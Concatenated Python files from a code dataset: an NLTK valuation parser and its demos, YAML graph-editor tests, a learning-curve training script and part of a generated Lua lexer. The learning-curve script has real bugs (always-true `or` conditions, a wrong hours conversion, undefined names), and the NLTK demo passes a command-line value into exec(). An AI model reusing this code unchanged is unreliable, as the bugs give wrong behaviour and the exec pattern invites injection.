re.compile(r'\s*=+>\s*') _ELEMENT_SPLIT_RE = re.compile(r'\s*,\s*') _TUPLES_RE = re.compile(r"""\s* (\([^)]+\)) # tuple-expression \s*""", re.VERBOSE) def parse_valuation_line(s, encoding=None): """ Parse a line in a valuation file. Lines are expected to be of the form:: noosa => n girl => {g1, g2} chase => {(b1, g1), (b2, g1), (g1, d1), (g2, d2)} :param s: input line :type s: str :param encoding: the encoding of the input string, if it is binary :type encoding: str :return: a pair (symbol, value) :rtype: tuple """ if encoding is not None: s = s.decode(encoding) pieces = _VAL_SPLIT_RE.split(s) symbol = pieces[0] value = pieces[1] # check whether the value is meant to be a set if value.startswith('{'): value = value[1:-1] tuple_strings = _TUPLES_RE.findall(value) # are the set elements tuples? if tuple_strings: set_elements = [] for ts in tuple_strings: ts = ts[1:-1] element = tuple(_ELEMENT_SPLIT_RE.split(ts)) set_elements.append(element) else: set_elements = _ELEMENT_SPLIT_RE.split(value) value = set(set_elements) return symbol, value def parse_valuation(s, encoding=None): """ Convert a valuation file into a valuation. :param s: the contents of a valuation file :type s: str :param encoding: the encoding of the input string, if it is binary :type encoding: str :return: a ``nltk.sem`` valuation :rtype: Valuation """ if encoding is not None: s = s.decode(encoding) statements = [] for linenum, line in enumerate(s.splitlines()): line = line.strip() if line.startswith('#') or line=='': continue try: statements.append(parse_valuation_line(line)) except ValueError: raise ValueError('Unable to parse line %s: %s' % (linenum, line)) val = evaluate.Valuation(statements) return val def demo_model0(): global m0, g0 #Initialize a valuation of non-logical constants.""" v = [('john', 'b1'), ('mary', 'g1'), ('suzie', 'g2'), ('fido', 'd1'), ('tess', 'd2'), ('noosa', 'n'), ('girl', set(['g1', 'g2'])), ('boy', set(['b1', 'b2'])), ('dog', set(['d1', 'd2'])), ('bark', set(['d1', 'd2'])), ('walk', set(['b1', 'g2', 'd1'])), ('chase', set([('b1', 'g1'), ('b2', 'g1'), ('g1', 'd1'), ('g2', 'd2')])), ('see', set([('b1', 'g1'), ('b2', 'd2'), ('g1', 'b1'),('d2', 'b1'), ('g2', 'n')])), ('in', set([('b1', 'n'), ('b2', 'n'), ('d2', 'n')])), ('with', set([('b1', 'g1'), ('g1', 'b1'), ('d1', 'b1'), ('b1', 'd1')])) ] #Read in the data from ``v`` val = evaluate.Valuation(v) #Bind ``dom`` to the ``domain`` property of ``val`` dom = val.domain #Initialize a model with parameters ``dom`` and ``val``. m0 = evaluate.Model(dom, val) #Initialize a variable assignment with parameter ``dom`` g0 = evaluate.Assignment(dom) def read_sents(filename, encoding='utf8'): with codecs.open(filename, 'r', encoding) as fp: sents = [l.rstrip() for l in fp] # get rid of blank lines sents = [l for l in sents if len(l) > 0] sents = [l for l in sents if not l[0] == '#'] return sents def demo_legacy_grammar(): """ Check that batch_interpret() is compatible with legacy grammars that use a lowercase 'sem' feature. Define 'test.fcfg' to be the following """ from nltk.grammar import parse_fcfg g = parse_fcfg(""" % start S S[sem=<hello>] -> 'hello' """) print("Reading grammar: %s" % g) print("*" * 20) for reading in batch_interpret(['hello'], g, semkey='sem'): syn, sem = reading[0] print() print("output: ", sem) def demo(): import sys from optparse import OptionParser description = \ """ Parse and evaluate some sentences. """ opts = OptionParser(description=description) opts.set_defaults(evaluate=True, beta=True, syntrace=0, semtrace=0, demo='default', grammar='', sentences='') opts.add_option("-d", "--demo", dest="demo", help="choose demo D; omit this for the default demo, or specify 'chat80'", metavar="D") opts.add_option("-g", "--gram", dest="grammar", help="read in grammar G", metavar="G") opts.add_option("-m", "--model", dest="model", help="import model M (omit '.py' suffix)", metavar="M") opts.add_option("-s", "--sentences", dest="sentences", help="read in a file of test sentences S", metavar="S") opts.add_option("-e", "--no-eval", action="store_false", dest="evaluate", help="just do a syntactic analysis") opts.add_option("-b", "--no-beta-reduction", action="store_false", dest="beta", help="don't carry out beta-reduction") opts.add_option("-t", "--syntrace", action="count", dest="syntrace", help="set syntactic tracing on; requires '-e' option") opts.add_option("-T", "--semtrace", action="count", dest="semtrace", help="set semantic tracing on") (options, args) = opts.parse_args() SPACER = '-' * 30 demo_model0() sents = [ 'Fido sees a boy with Mary', 'John sees Mary', 'every girl chases a dog', 'every boy chases a girl', 'John walks with a girl in Noosa', 'who walks'] gramfile = 'grammars/sample_grammars/sem2.fcfg' if options.sentences: sentsfile = options.sentences if options.grammar: gramfile = options.grammar if options.model: exec("import %s as model" % options.model) if sents is None: sents = read_sents(sentsfile) # Set model and assignment model = m0 g = g0 if options.evaluate: evaluations = \ batch_evaluate(sents, gramfile, model, g, trace=options.semtrace) else: semreps = \ batch_interpret(sents, gramfile, trace=options.syntrace) for i, sent in enumerate(sents): n = 1 print('\nSentence: %s' % sent) print(SPACER) if options.evaluate: for (syntree, semrep, value) in evaluations[i]: if isinstance(value, dict): value = set(value.keys()) print('%d: %s' % (n, semrep)) print(value) n += 1 else: for (syntree, semrep) in semreps[i]: print('%d: %s' % (n, semrep)) n += 1 if __name__ == "__main__": #demo() demo_legacy_grammar()
StarcoderdataPython
155100
<gh_stars>1-10 import re import textwrap from pathlib import Path from patterns.configuration.edit import GraphConfigEditor def test_round_trip(tmp_path: Path): s = """ title: graph functions: - webhook: out # eol comment # node 1 - node_file: node_1.py inputs: in: out """ get_editor(tmp_path, s).assert_dump(s) def test_round_trip_no_indent(tmp_path: Path): s = """ functions: - webhook: out # eol comment - node_file: node_1.py inputs: in: out """ get_editor(tmp_path, s).assert_dump(s) def test_add_node_to_existing_nodes(tmp_path: Path): before = """ functions: - webhook: out # eol comment """ after = """ functions: - webhook: out # eol comment - node_file: node.py id: <id> """ get_editor(tmp_path, before).add_node("node.py").assert_dump(after) def test_add_node_to_empty_graph(tmp_path: Path): before = """ title: graph """ after = """ title: graph functions: - node_file: node.py id: <id> """ get_editor(tmp_path, before).add_node("node.py").assert_dump(after) def test_add_webhook_with_all_fields(tmp_path: Path): before = """ title: graph """ after = """ title: graph functions: - webhook: hook title: n id: ab234567 description: desc """ get_editor(tmp_path, before).add_webhook( "hook", "n", "ab234567", "desc" ).assert_dump(after) def test_add_store_with_all_fields(tmp_path: Path): before = """ title: graph """ after = """ title: graph stores: - stream: st title: n id: ab234567 schema: sc """ get_editor(tmp_path, before).add_store( "st", False, "n", "ab234567", "sc" ).assert_dump(after) def test_add_node_with_all_fields(tmp_path: Path): before = """ title: graph functions: - webhook: hook """ after = """ title: graph functions: - webhook: hook - node_file: node.py schedule: daily inputs: node_in: hook outputs: node_out: my_table parameters: limit: 2 title: my node id: ab234567 description: desc """ get_editor(tmp_path, before).add_node( "node.py", schedule="daily", inputs={"node_in": "hook"}, outputs={"node_out": "my_table"}, parameters={"limit": 2}, title="my node", id="ab234567", description="desc", ).assert_dump(after) def test_add_component_with_all_fields(tmp_path: Path): before = """ title: graph functions: - webhook: hook """ after = """ title: graph functions: - webhook: hook - uses: org/component@v1 schedule: daily inputs: node_in: hook outputs: node_out: my_table parameters: limit: 2 title: my node id: ab234567 description: desc """ get_editor(tmp_path, before).add_component_uses( "org/component@v1", schedule="daily", inputs={"node_in": "hook"}, outputs={"node_out": "my_table"}, parameters={"limit": 2}, title="my node", id="ab234567", description="desc", ).assert_dump(after) def test_add_missing_node_ids(tmp_path: Path): before = """ functions: - node_file: a.py title: a - node_file: b.py id: foo - node_file: c.py stores: - table: t - stream: s """ after = """ functions: - node_file: a.py title: a id: <id> - node_file: b.py id: <id> - node_file: c.py id: <id> stores: - table: t id: <id> - stream: s id: <id> """ editor = get_editor(tmp_path, before).add_missing_node_ids() dump = editor.assert_dump(after) assert "id: foo" in dump def get_editor(tmp_path: Path, s: str) -> "_EditorTester": f = tmp_path / "graph.yml" s = textwrap.dedent(s).strip() f.write_text(s) return _EditorTester(f) class _EditorTester(GraphConfigEditor): def assert_dump(self, s: str) -> str: s = textwrap.dedent(s).strip() dump = self.dump().strip() if "<id>" in s: dump = re.sub(r"id: \w+", "id: <id>", dump) assert dump == s return self.dump().strip()
StarcoderdataPython
153123
""" This script generates multiple learning curves for different training sets. It launches a script (e.g. trn_lrn_crv.py) that train ML model(s) on various training set sizes. """ from __future__ import print_function, division import warnings warnings.filterwarnings('ignore') import os import sys from pathlib import Path import argparse from datetime import datetime from time import time from pprint import pprint, pformat from collections import OrderedDict from glob import glob import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import sklearn import numpy as np import pandas as pd from sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler SEED = 42 # File path # file_path = os.path.dirname(os.path.realpath(__file__)) file_path = Path(__file__).resolve().parent # Utils utils_path = file_path / '../../utils' sys.path.append(str(utils_path)) import utils # from utils_tidy import load_tidy_combined, get_data_by_src, break_src_data from classlogger import Logger from lrn_crv import LearningCurve # Path PRJ_NAME = file_path.name OUTDIR = file_path / '../../out/' / PRJ_NAME def parse_args(args): parser = argparse.ArgumentParser(description="Generate learning curves.") # Input data parser.add_argument('--dirpath', default=None, type=str, help='Full path to data and splits (default: None).') # Select data name # parser.add_argument('--dname', default=None, choices=['combined'], help='Data name (default: `combined`).') # Select (cell line) sources # parser.add_argument('-src', '--src_names', nargs='+', # default=None, choices=['ccle', 'gcsi', 'gdsc', 'ctrp', 'nci60'], # help='Data sources to use (relevant only for the `combined` dataset).') # Select target to predict parser.add_argument('-t', '--target_name', default='AUC', type=str, choices=['AUC', 'AUC1', 'IC50'], help='Name of target variable (default: AUC).') # Select feature types parser.add_argument('-cf', '--cell_features', nargs='+', default=['rna'], choices=['rna', 'cnv', 'clb'], help='Cell line features (default: rna).') parser.add_argument('-df', '--drug_features', nargs='+', default=['dsc'], choices=['dsc', 'fng', 'dlb'], help='Drug features (default: dsc).') parser.add_argument('-of', '--other_features', default=[], choices=[], help='Other feature types (derived from cell lines and drugs). E.g.: cancer type, etc).') # ['cell_labels', 'drug_labels', 'ctype', 'csite', 'rna_clusters'] # Data split methods parser.add_argument('-cvm', '--cv_method', default='simple', type=str, choices=['simple', 'group'], help='CV split method (default: simple).') parser.add_argument('-cvf', '--cv_folds', default=5, type=str, help='Number cross-val folds (default: 5).') # ML models # parser.add_argument('-frm', '--framework', default='lightgbm', type=str, choices=['keras', 'lightgbm', 'sklearn'], help='ML framework (default: lightgbm).') parser.add_argument('-ml', '--model_name', default='lgb_reg', type=str, # choices=['lgb_reg', 'rf_reg', 'nn_reg', 'nn_reg0', 'nn_reg1', 'nn_reg2', 'nn_reg3', 'nn_reg4'], help='ML model for training (default: lgb_reg).') # NN hyper_params parser.add_argument('-ep', '--epochs', default=200, type=int, help='Number of epochs (default: 200).') parser.add_argument('--batch_size', default=32, type=int, help='Batch size (default: 32).') parser.add_argument('--dr_rate', default=0.2, type=float, help='Dropout rate (default: 0.2).') parser.add_argument('-sc', '--scaler', default='stnd', type=str, choices=['stnd', 'minmax', 'rbst'], help='Feature normalization method (default: stnd).') parser.add_argument('--opt', default='sgd', type=str, choices=['sgd', 'adam'], help='Optimizer name (default: sgd).') parser.add_argument('--clr_mode', default=None, type=str, choices=['trng1', 'trng2', 'exp'], help='CLR mode (default: trng1).') parser.add_argument('--clr_base_lr', type=float, default=1e-4, help='Base lr for cycle lr.') parser.add_argument('--clr_max_lr', type=float, default=1e-3, help='Max lr for cycle lr.') parser.add_argument('--clr_gamma', type=float, default=0.999994, help='Gamma parameter for learning cycle LR.') # Learning curve parser.add_argument('--n_shards', default=5, type=int, help='Number of ticks in the learning curve plot (default: 5).') # Define n_jobs parser.add_argument('--n_jobs', default=4, type=int, help='Default: 4.') # Parse args args = parser.parse_args(args) return args def create_outdir(outdir, args, src): t = datetime.now() t = [t.year, '-', t.month, '-', t.day, '_', 'h', t.hour, '-', 'm', t.minute] t = ''.join([str(i) for i in t]) l = [('cvf'+str(args['cv_folds']))] + args['cell_features'] + args['drug_features'] + [args['target_name']] if args['clr_mode'] is not None: l = [args['clr_mode']] + l if 'nn' in args['model_name']: l = [args['opt']] + l name_sffx = '.'.join( [src] + [args['model_name']] + l ) outdir = Path(outdir) / (name_sffx + '_' + t) #outdir = Path(outdir) / name_sffx os.makedirs(outdir) #os.makedirs(outdir, exist_ok=True) return outdir def run(args): dirpath = Path(args['dirpath']) # dname = args['dname'] # src_names = args['src_names'] # Target target_name = args['target_name'] # Data split cv_folds = args['cv_folds'] # Features cell_fea = args['cell_features'] drug_fea = args['drug_features'] other_fea = args['other_features'] fea_list = cell_fea + drug_fea + other_fea # NN params epochs = args['epochs'] batch_size = args['batch_size'] dr_rate = args['dr_rate'] # Optimizer opt_name = args['opt'] clr_keras_kwargs = {'mode': args['clr_mode'], 'base_lr': args['clr_base_lr'], 'max_lr': args['clr_max_lr'], 'gamma': args['clr_gamma']} # Learning curve n_shards = args['n_shards'] # Other params # framework = args['framework'] model_name = args['model_name'] n_jobs = args['n_jobs'] # ML type ('reg' or 'cls') if 'reg' in model_name: mltype = 'reg' elif 'cls' in model_name: mltype = 'cls' else: raise ValueError("model_name must contain 'reg' or 'cls'.") # Define metrics # metrics = {'r2': 'r2', # 'neg_mean_absolute_error': 'neg_mean_absolute_error', #sklearn.metrics.neg_mean_absolute_error, # 'neg_median_absolute_error': 'neg_median_absolute_error', #sklearn.metrics.neg_median_absolute_error, # 'neg_mean_squared_error': 'neg_mean_squared_error', #sklearn.metrics.neg_mean_squared_error, # 'reg_auroc_score': utils.reg_auroc_score} # ======================================================================== # Load data and pre-proc # ======================================================================== dfs = {} def get_file(fpath): return pd.read_csv(fpath, header=None).squeeze().values if fpath.is_file() else None def read_data_file(fpath, file_format='csv'): fpath = Path(fpath) if fpath.is_file(): if file_format=='csv': df = pd.read_csv( fpath ) elif file_format=='parquet': df = pd.read_parquet( fpath ) else: df = None return df if dirpath is not None: xdata = read_data_file( dirpath/'xdata.parquet', 'parquet' ) meta = read_data_file( dirpath/'meta.parquet', 'parquet' ) ydata = meta[[target_name]] tr_id = pd.read_csv( dirpath/f'{cv_folds}fold_tr_id.csv' ) vl_id = pd.read_csv( dirpath/f'{cv_folds}fold_vl_id.csv' ) # tr_ids_list = get_file( dirpath/f'{cv_folds}fold_tr_id.csv' ) # vl_ids_list = get_file( dirpath/f'{cv_folds}fold_vl_id.csv' ) # te_ids_list = get_file( dirpath/f'{cv_folds}fold_te_id.csv' ) src = dirpath.name.split('_')[0] dfs[src] = (ydata, xdata, tr_id, vl_id) elif dname == 'combined': # TODO: this is not used anymore (probably won't work) DATADIR = file_path / '../../data/processed/data_splits' DATAFILENAME = 'data.parquet' dirs = glob( str(DATADIR/'*') ) for src in src_names: print(f'\n{src} ...') subdir = f'{src}_cv_{cv_method}' if str(DATADIR/subdir) in dirs: # Get the CV indexes tr_id = pd.read_csv( DATADIR/subdir/f'{cv_folds}fold_tr_id.csv' ) vl_id = pd.read_csv( DATADIR/subdir/f'{cv_folds}fold_vl_id.csv' ) # Get the data datapath = DATADIR / subdir / DATAFILENAME data = pd.read_parquet( datapath ) xdata, _, meta, _ = break_src_data(data, target=None, scaler=None) # logger=lg.logger ydata = meta[[target_name]] dfs[src] = (ydata, xdata, tr_id, vl_id) del data, xdata, ydata, tr_id, vl_id, src for src, data in dfs.items(): ydata, xdata, tr_id, vl_id = data[0], data[1], data[2], data[3] # Scale scaler = args['scaler'] if scaler is not None: if scaler == 'stnd': scaler = StandardScaler() elif scaler == 'minmax': scaler = MinMaxScaler() elif scaler == 'rbst': scaler = RobustScaler() cols = xdata.columns xdata = pd.DataFrame(scaler.fit_transform(xdata), columns=cols, dtype=np.float32) # ----------------------------------------------- # Create outdir and logger # ----------------------------------------------- run_outdir = create_outdir(OUTDIR, args, src) lg = Logger(run_outdir/'logfile.log') lg.logger.info(f'File path: {file_path}') lg.logger.info(f'\n{pformat(args)}') # Dump args to file utils.dump_dict(args, outpath=run_outdir/'args.txt') # ----------------------------------------------- # ML model configs # ----------------------------------------------- if model_name == 'lgb_reg': framework = 'lightgbm' init_kwargs = {'n_jobs': n_jobs, 'random_state': SEED, 'logger': lg.logger} fit_kwargs = {'verbose': False} elif model_name == 'nn_reg': framework = 'keras' init_kwargs = {'input_dim': xdata.shape[1], 'dr_rate': dr_rate, 'opt_name': opt_name, 'attn': attn, 'logger': lg.logger} fit_kwargs = {'batch_size': batch_size, 'epochs': epochs, 'verbose': 1} elif model_name == 'nn_reg0' or 'nn_reg1' or 'nn_reg2': framework = 'keras' init_kwargs = {'input_dim': xdata.shape[1], 'dr_rate': dr_rate, 'opt_name': opt_name, 'logger': lg.logger} fit_kwargs = {'batch_size': batch_size, 'epochs': epochs, 'verbose': 1} # 'validation_split': 0.1 elif model_name == 'nn_reg3' or 'nn_reg4': framework = 'keras' init_kwargs = {'in_dim_rna': None, 'in_dim_dsc': None, 'dr_rate': dr_rate, 'opt_name': opt_name, 'logger': lg.logger} fit_kwargs = {'batch_size': batch_size, 'epochs': epochs, 'verbose': 1} # 'validation_split': 0.1 # ----------------------------------------------- # Learning curve # ----------------------------------------------- lg.logger.info('\n\n{}'.format('=' * 50)) lg.logger.info(f'Learning curves {src} ...') lg.logger.info('=' * 50) t0 = time() lc = LearningCurve( X=xdata, Y=ydata, cv=None, cv_lists=(tr_id, vl_id), n_shards=n_shards, shard_step_scale='log10', args=args, logger=lg.logger, outdir=run_outdir ) lrn_crv_scores = lc.trn_learning_curve( framework=framework, mltype=mltype, model_name=model_name, init_kwargs=init_kwargs, fit_kwargs=fit_kwargs, clr_keras_kwargs=clr_keras_kwargs, n_jobs=n_jobs, random_state=SEED ) lg.logger.info('Runtime: {:.1f} hrs'.format( (time()-t0)/360) ) # ------------------------------------------------- # Learning curve (sklearn method) # Problem! cannot log multiple metrics. # ------------------------------------------------- """ lg.logger.info('\nStart learning curve (sklearn method) ...') # Define params metric_name = 'neg_mean_absolute_error' base = 10 train_sizes_frac = np.logspace(0.0, 1.0, lc_ticks, endpoint=True, base=base)/base # Run learning curve t0 = time() lrn_curve_scores = learning_curve( estimator=model.model, X=xdata, y=ydata, train_sizes=train_sizes_frac, cv=cv, groups=groups, scoring=metric_name, n_jobs=n_jobs, exploit_incremental_learning=False, random_state=SEED, verbose=1, shuffle=False) lg.logger.info('Runtime: {:.1f} mins'.format( (time()-t0)/60) ) # Dump results # lrn_curve_scores = utils.cv_scores_to_df(lrn_curve_scores, decimals=3, calc_stats=False) # this func won't work # lrn_curve_scores.to_csv(os.path.join(run_outdir, 'lrn_curve_scores_auto.csv'), index=False) # Plot learning curves lrn_crv.plt_learning_curve(rslt=lrn_curve_scores, metric_name=metric_name, title='Learning curve (target: {}, data: {})'.format(target_name, tr_sources_name), path=os.path.join(run_outdir, 'auto_learning_curve_' + target_name + '_' + metric_name + '.png')) """ lg.kill_logger() del xdata, ydata print('Done.') def main(args): args = parse_args(args) args = vars(args) run(args) if __name__ == '__main__': main(sys.argv[1:])
StarcoderdataPython
3257265
<filename>runtests/python_lua/lua_lexer.py from _tbnf.FableSedlex.sedlex import * import typing import typing_extensions import dataclasses _sedlex_rnd_379 = [ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, None, None, 55, 56, 57, 58, 59, -1 ] # token_ids def _sedlex_st_145(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 53) state_id = _sedlex_decide_14(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_378[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_377(lexerbuf: lexbuf): result = -1 result = 54 return result def _sedlex_st_141(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 49) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_376[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_375(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_140(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_25(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_374[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_373(lexerbuf: lexbuf): result = -1 result = _sedlex_st_141(lexerbuf) return result def _sedlex_rnd_372(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_139(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_34(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_371[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_370(lexerbuf: lexbuf): result = -1 result = _sedlex_st_140(lexerbuf) return result def _sedlex_rnd_369(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_138(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_31(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_368[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_367(lexerbuf: lexbuf): result = -1 result = _sedlex_st_139(lexerbuf) return result def _sedlex_rnd_366(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_137(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_42(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_365[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_42(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_35[c - 48] - 1 else: return -1 def _sedlex_rnd_364(lexerbuf: lexbuf): result = -1 result = _sedlex_st_138(lexerbuf) return result def _sedlex_rnd_363(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_136(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 48) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_362[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_361(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_135(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_34(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_360[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_359(lexerbuf: lexbuf): result = -1 result = _sedlex_st_136(lexerbuf) return result def _sedlex_rnd_358(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_134(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_31(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_357[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_356(lexerbuf: lexbuf): result = -1 result = _sedlex_st_135(lexerbuf) return result def _sedlex_rnd_355(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_133(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_36(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_354[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_353(lexerbuf: lexbuf): result = -1 result = _sedlex_st_134(lexerbuf) return result def _sedlex_rnd_352(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_132(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_22(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_351[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_350(lexerbuf: lexbuf): result = -1 result = _sedlex_st_133(lexerbuf) return result def _sedlex_rnd_349(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_131(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 47) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_348[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_347(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_130(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_25(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_346[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_345(lexerbuf: lexbuf): result = -1 result = _sedlex_st_131(lexerbuf) return result def _sedlex_rnd_344(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_129(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_40(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_343[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_342(lexerbuf: lexbuf): result = -1 result = _sedlex_st_130(lexerbuf) return result def _sedlex_rnd_341(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_128(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 46) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_340[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_339(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_127(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_22(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_338[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_337(lexerbuf: lexbuf): result = -1 result = _sedlex_st_128(lexerbuf) return result def _sedlex_rnd_336(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_126(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_25(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_335[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_334(lexerbuf: lexbuf): result = -1 result = _sedlex_st_127(lexerbuf) return result def _sedlex_rnd_333(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_125(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_41(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_332[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_41(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_34[c - 48] - 1 else: return -1 def _sedlex_rnd_331(lexerbuf: lexbuf): result = -1 result = _sedlex_st_129(lexerbuf) return result def _sedlex_rnd_330(lexerbuf: lexbuf): result = -1 result = _sedlex_st_126(lexerbuf) return result def _sedlex_rnd_329(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_124(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 45) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_328[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_327(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_123(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_22(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_326[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_325(lexerbuf: lexbuf): result = -1 result = _sedlex_st_124(lexerbuf) return result def _sedlex_rnd_324(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_122(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_24(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_323[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_322(lexerbuf: lexbuf): result = -1 result = _sedlex_st_123(lexerbuf) return result def _sedlex_rnd_321(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_121(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_40(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_320[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_40(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_33[c - 48] - 1 else: return -1 def _sedlex_rnd_319(lexerbuf: lexbuf): result = -1 result = _sedlex_st_122(lexerbuf) return result def _sedlex_rnd_318(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_120(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 44) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_317[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_316(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_119(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_36(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_315[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_314(lexerbuf: lexbuf): result = -1 result = _sedlex_st_120(lexerbuf) return result def 